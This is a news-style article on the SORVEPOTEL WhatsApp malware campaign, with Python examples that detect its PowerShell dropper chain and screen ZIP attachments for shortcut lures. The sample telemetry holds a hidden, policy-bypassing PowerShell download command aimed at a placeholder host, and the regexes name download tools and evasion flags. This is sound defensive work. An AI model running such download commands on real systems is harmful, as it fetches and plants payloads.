Self-Spreading WhatsApp Malware Hits Users

New Self-Spreading Malware Targets WhatsApp Users

Self-spreading WhatsApp malware is attacking users in Brazil, spreading fast through phishing messages with ZIP attachments. Researchers discovered that this campaign, called SORVEPOTEL, aims for speed and reach rather than stealing data or locking systems. However, its quick spread still poses serious risks to users and organizations.

The malware exploits trust in WhatsApp’s desktop platform. Once triggered, it automatically spreads through the victim’s contacts, sending out the same infected file. Therefore, even cautious users may unknowingly pass the malware to others.

How the Attack Works

The attack begins with a phishing message sent from a compromised contact. The message appears genuine, often claiming to include a receipt or health-related file. However, the ZIP file it contains hides a dangerous payload.

Once the archive is opened, the user is tricked into launching a Windows shortcut (.LNK) file. This shortcut silently runs a PowerShell script that downloads the main malware from an external server. The malware then installs itself in the Windows Startup folder so that it runs every time the system starts.

After installation, it connects to a command-and-control server for further instructions. Therefore, the attacker can update the malware or spread additional harmful files without direct user action.
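The chain described above (shortcut launched from an extracted ZIP, PowerShell fetching a payload, a copy dropped into the Startup folder) is visible in ordinary process-creation and file-creation telemetry. The following is an added detection example written for this article, not code from the researchers or from the malware; it assumes a generic event schema (pid, ppid, image, cmdline, cwd for processes; pid, image, target path for file writes), and every event below is constructed sample data, including the placeholder URL.

```python
"""Flag a SORVEPOTEL-style dropper chain in process and file telemetry (added example)."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the launched executable
    cmdline: str    # command line as logged
    cwd: str        # working directory at launch


@dataclass
class FileEvent:
    pid: int
    image: str
    target: str     # path of the file that was created


# Explorer extracts a ZIP member into %TEMP%\TempN_<archive>.zip\ when it is
# double-clicked inside the archive view; a shortcut run from there is a strong signal.
ZIP_VIEW_TEMP = re.compile(r"\\Temp\\Temp\d+_[^\\]+\.zip\\?", re.I)
STARTUP_DIR = re.compile(r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", re.I)
DOWNLOAD_HINTS = re.compile(
    r"(?:invoke-webrequest|iwr\b|downloadstring|downloadfile|net\.webclient|curl\b|wget\b)", re.I)
EVASION_HINTS = re.compile(
    r"(?:-w(?:indowstyle)?\s+hidden|-e(?:ncodedcommand)?\s|-ep\s+bypass|-executionpolicy\s+bypass|-nop\b)",
    re.I)


def score_process(ev: ProcEvent, by_pid: dict) -> list:
    """Return the reasons a PowerShell launch looks like the article's dropper stage."""
    reasons = []
    if not ev.image.lower().endswith(("powershell.exe", "pwsh.exe")):
        return reasons
    parent = by_pid.get(ev.ppid)
    if parent and parent.image.lower().endswith("explorer.exe"):
        reasons.append("launched from Explorer (typical of a double-clicked shortcut)")
    if ZIP_VIEW_TEMP.search(ev.cwd) or ZIP_VIEW_TEMP.search(ev.cmdline):
        reasons.append("runs out of Explorer's temporary ZIP view folder")
    if DOWNLOAD_HINTS.search(ev.cmdline):
        reasons.append("command line fetches remote content")
    if EVASION_HINTS.search(ev.cmdline):
        reasons.append("hidden window / execution-policy bypass flags")
    return reasons


def find_dropper_chains(events: list, min_reasons: int = 2) -> list:
    """Return (pid, reasons) for every process that trips at least min_reasons checks."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        reasons = score_process(ev, by_pid)
        if len(reasons) >= min_reasons:
            hits.append((ev.pid, reasons))
    return hits


def find_startup_persistence(file_events: list) -> list:
    """Return (pid, path) for every file created inside a user's Startup folder."""
    return [(fe.pid, fe.target) for fe in file_events if STARTUP_DIR.search(fe.target)]


# Constructed sample telemetry: one malicious chain, one legitimate scheduled script,
# one ordinary Office launch. None of these paths or URLs are real indicators.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe", r"C:\Users\ana"),
    ProcEvent(200, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -w hidden -ep bypass -c "iwr http://EXAMPLE-PLACEHOLDER/x.bin -OutFile $env:APPDATA\x.bin"',
              r"C:\Users\ana\AppData\Local\Temp\Temp1_recibo.zip"),
    ProcEvent(300, 100, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r'"WINWORD.EXE" C:\Users\ana\Documents\report.docx', r"C:\Users\ana\Documents"),
    ProcEvent(400, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\scripts\backup.ps1", r"C:\scripts"),
]
SAMPLE_FILE_EVENTS = [
    FileEvent(200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Users\ana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"),
    FileEvent(500, r"C:\Windows\System32\msiexec.exe", r"C:\Program Files\Vendor\app.exe"),
]

if __name__ == "__main__":
    for pid, reasons in find_dropper_chains(SAMPLE_EVENTS):
        print(f"pid {pid}: " + "; ".join(reasons))
    for pid, path in find_startup_persistence(SAMPLE_FILE_EVENTS):
        print(f"pid {pid} wrote to Startup: {path}")
```

Requiring two independent signals (for example Explorer parentage plus a download cmdlet) keeps the legitimate `backup.ps1` launch out of the results while the shortcut-driven download is flagged on all four checks; the Startup-folder write is reported separately because persistence by itself is worth an alert even when the earlier stage was not logged.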

Rapid Propagation Through WhatsApp Web

If the infected device has WhatsApp Web active, the malware immediately sends the malicious ZIP file to all contacts and groups. This automated process enables rapid, large-scale infection with minimal effort from the attacker.

Because of this excessive spam, many infected accounts end up banned by WhatsApp for violating its terms of service. Researchers note that most infections, 457 out of 477 reported, occurred in Brazil. The attacks have hit the government, technology, and education sectors the hardest.

Broader Implications and Trends

This campaign highlights a growing trend: cybercriminals are increasingly using trusted communication platforms to spread malware quickly. Since users often believe messages from familiar contacts, phishing campaigns through chat apps can be highly effective.

Therefore, experts warn that individuals and companies must strengthen their digital hygiene. Regular awareness training and technical safeguards are essential to block such threats.

Preventing Future Attacks

To prevent infections like SORVEPOTEL, users should avoid opening ZIP attachments from unknown or unexpected sources. Organizations can enhance protection by using managed threat monitoring and endpoint security services. These tools can detect suspicious file behavior and block malicious links before they reach users.

Regular system updates, phishing simulations, and automated malware scanning can further reduce the risk of infection. Therefore, proactive defense and real-time monitoring are key to keeping networks safe from fast-spreading threats like this one.
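One of the technical safeguards above, blocking a suspicious ZIP attachment before a user can open it, can be checked without extracting anything to disk. The following is an added example written for this article (not code from any vendor or from the researchers): it reads the archive's central directory and flags members that are executable on Windows, that carry a document-looking double extension such as `.pdf.lnk`, that begin with the Windows shell link header, or that are encrypted and therefore cannot be scanned. The two sample archives are constructed in memory, and the `.lnk` content is a placeholder header rather than a real shortcut.

```python
"""Inspect a ZIP attachment for SORVEPOTEL-style lures without extracting it (added example)."""
import io
import zipfile
from pathlib import PureWindowsPath

# File types Windows runs directly when double-clicked.
EXECUTABLE_EXTS = {".lnk", ".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".vbs", ".vbe",
                   ".js", ".jse", ".wsf", ".wsh", ".ps1", ".hta", ".msi"}
# Extensions attackers put in front of an executable one to make it look like a document.
DECOY_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".png", ".txt"}
# First 8 bytes of a Windows shell link: header size 0x4C followed by the start of its CLSID.
LNK_MAGIC = b"L\x00\x00\x00\x01\x14\x02\x00"


def inspect_zip_bytes(data: bytes) -> list:
    """Return a list of human-readable findings; an empty list means nothing suspicious."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ["not a valid ZIP archive"]
    with zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            suffixes = [s.lower() for s in PureWindowsPath(name.replace("/", "\\")).suffixes]
            ext = suffixes[-1] if suffixes else ""
            if ext in EXECUTABLE_EXTS:
                findings.append(f"{name}: executable member ({ext})")
            if len(suffixes) >= 2 and suffixes[-2] in DECOY_EXTS and ext in EXECUTABLE_EXTS:
                findings.append(f"{name}: document-looking double extension")
            if info.flag_bits & 0x1:
                # Encrypted members cannot be content-scanned; treat as a finding on its own.
                findings.append(f"{name}: encrypted member (content cannot be scanned)")
                continue
            with zf.open(info) as member:
                head = member.read(len(LNK_MAGIC))
            if head == LNK_MAGIC:
                findings.append(f"{name}: content starts with a Windows shell link header")
    return findings


def should_block(data: bytes) -> bool:
    """Policy decision for a mail or chat gateway: block when any finding exists."""
    return bool(inspect_zip_bytes(data))


def build_sample_zip(members: dict) -> bytes:
    """Build a small in-memory archive from {name: content} (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed samples: a receipt-themed lure carrying a shortcut, and a harmless PDF.
SUSPICIOUS_ZIP = build_sample_zip({"Recibo_2025.pdf.lnk": LNK_MAGIC + b"\x00" * 68})
BENIGN_ZIP = build_sample_zip({"report/summary.pdf": b"%PDF-1.4\n%constructed sample\n"})

if __name__ == "__main__":
    for label, blob in (("suspicious", SUSPICIOUS_ZIP), ("benign", BENIGN_ZIP)):
        print(label, "->", "BLOCK" if should_block(blob) else "allow", inspect_zip_bytes(blob))
```

Checking the central directory first means a gateway can reject an archive on its member names alone, and the header check catches a shortcut that was renamed to a harmless extension; an encrypted member is reported rather than silently passed because password-protected archives are a common way to get a payload past scanners.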
